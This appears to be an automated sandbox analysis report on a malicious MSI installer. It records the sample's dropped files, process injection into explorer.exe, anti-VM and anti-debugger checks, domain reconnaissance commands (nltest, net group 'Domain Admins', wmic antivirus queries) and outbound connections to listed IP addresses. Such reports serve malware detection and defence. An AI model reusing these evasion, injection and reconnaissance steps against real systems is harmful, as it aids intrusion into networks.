Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI46EC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI48D4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI471C.tmp	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI468D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI473C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI46EC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI48D4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI471C.tmp	Jump to dropped file

Boot Survival

Uses net.exe to modify the status of services

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\net.exe net config workstation

Uses whoami command line tool to query computer and username

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D76DC rdtsc

9_2_0B8D76DC

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D4948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

9_2_0B8D4948

Contains functionality to query network adapater information

Source: C:\Windows\System32\rundll32.exe	Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,	5_2_0000023CDA4A4D00
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	9_2_01378424
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	9_2_01377274

Contains functionality to read device registry values (via SetupAPI)

Source: C:\Windows\System32\rundll32.exe

5_2_00007FFDFA8ADCBC

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5757	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 484	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3320	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 876	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 877	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI468D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\wait.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI473C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI46EC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI471C.tmp	Jump to dropped file

Found evasive API chain checking for process token information

Source: C:\Windows\Installer\MSI48D4.tmp	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\rundll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\Installer\MSI48D4.tmp	API coverage: 6.4 %
Source: C:\Windows\System32\rundll32.exe	API coverage: 3.8 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 8080	Thread sleep count: 5757 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8080	Thread sleep time: -5757000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8088	Thread sleep count: 484 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8088	Thread sleep time: -48400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8080	Thread sleep count: 3320 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8080	Thread sleep time: -3320000s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Queries the current domain controller via net

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C4B02D FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00C4B02D
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA922E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose,	5_2_00007FFDFA922E90
Source: C:\Windows\explorer.exe	Code function: 9_2_0137A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,	9_2_0137A8E0
Source: C:\Windows\explorer.exe	Code function: 9_2_01372B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	9_2_01372B28
Source: C:\Windows\explorer.exe	Code function: 9_2_013804C0 FindFirstFileW,	9_2_013804C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D16F4 FindFirstFileW,FindNextFileW,LoadLibraryW,	9_2_0B8D16F4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	9_2_0B8D6604

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA8A9A80 GetSystemInfo,

5_2_00007FFDFA8A9A80

Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.2053703533.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000009.00000000.2053703533.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000009.00000003.3618520835.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000009.00000000.2053703533.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: rundll32.exe, 00000005.00000002.4125113963.0000023CD8B0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125203904.0000023CD8BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131028570.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000009.00000000.2052116683.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618520835.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462488864.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3114928879.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000009.00000003.2944396374.0000000008B70000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000009.00000002.4131028570.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D76DC rdtsc

9_2_0B8D76DC

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_0000023CDA48CCE0 LdrGetProcedureAddress,

5_2_0000023CDA48CCE0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C1D0A5 IsDebuggerPresent,OutputDebugStringW,

3_2_00C1D0A5

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA968990 GetLastError,IsDebuggerPresent,OutputDebugStringW,

5_2_00007FFDFA968990

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D4948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

9_2_0B8D4948

Contains functionality to dynamically determine API calls

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D89E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

9_2_0B8D89E4

Contains functionality to read the PEB

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C42DCC mov ecx, dword ptr fs:[00000030h]		3_2_00C42DCC
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C4AD78 mov eax, dword ptr fs:[00000030h]		3_2_00C4AD78

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C12310 GetProcessHeap,

3_2_00C12310

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\Installer\MSI48D4.tmp "C:\Windows\Installer\MSI48D4.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\wait.dll, Jump

Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C333A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00C333A8
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3353F SetUnhandledExceptionFilter,	3_2_00C3353F
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C32968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00C32968
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C36E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00C36E1B
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA97CFD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FFDFA97CFD8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA946264 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FFDFA946264
Source: C:\Windows\explorer.exe	Code function: 9_2_0B961DA0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_0B961DA0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9753A8 SetUnhandledExceptionFilter,	9_2_0B9753A8

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.68.89 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.16.251 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 103.57.249.207 6542	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory allocated: C:\Windows\explorer.exe base: 1370000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Windows\System32\rundll32.exe

Code function: 5_3_00007DF4877C0100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,

5_3_00007DF4877C0100

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\rundll32.exe

Thread created: C:\Windows\explorer.exe EIP: 1370000

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 1370000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\rundll32.exe

Memory written: PID: 2580 base: 1370000 value: 4D

Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\rundll32.exe

Thread register set: 7664 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 1370000

Jump to behavior

Contains functionality to launch a program with higher privileges

Source: C:\Windows\Installer\MSI48D4.tmp

3_2_00C152F0

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA8A9AC0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,

5_2_00007FFDFA8A9AC0

Source: explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4125727069.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2051955138.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000002.4125727069.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2050968000.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000002.4125057147.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000009.00000002.4125727069.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2050968000.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000002.4125727069.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2050968000.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C335A9 cpuid

3_2_00C335A9

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: EnumSystemLocalesW,	3_2_00C4E0C6
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: EnumSystemLocalesW,	3_2_00C4E1AC
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: EnumSystemLocalesW,	3_2_00C4E111
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: EnumSystemLocalesW,	3_2_00C47132
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_00C4E237
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoEx,	3_2_00C323F8
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,	3_2_00C4E48A
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00C4E5B3
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,	3_2_00C476AF
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,	3_2_00C4E6B9
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00C4E788
Source: C:\Windows\System32\rundll32.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,wcschr,wcschr,GetLocaleInfoW,	5_2_00007FFDFA99DB78
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_00007FFDFA99DEC8
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_00007FFDFA99DF98
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,	5_2_00007FFDFA993D30
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_00007FFDFA99E3D8
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_00007FFDFA9936A8
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_00007FFDFA99E5B4

Queries device information via Setup API

Source: C:\Windows\System32\rundll32.exe

5_2_00007FFDFA8ADCBC

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C337D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_00C337D5

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_0000023CDA4A4D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,

5_2_0000023CDA4A4D00

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C47B1F GetTimeZoneInformation,

3_2_00C47B1F

Source: C:\Windows\explorer.exe

Code function: 9_2_0137891C RtlGetVersion,GetVersionExW,

9_2_0137891C

Source: C:\Windows\System32\nltest.exe

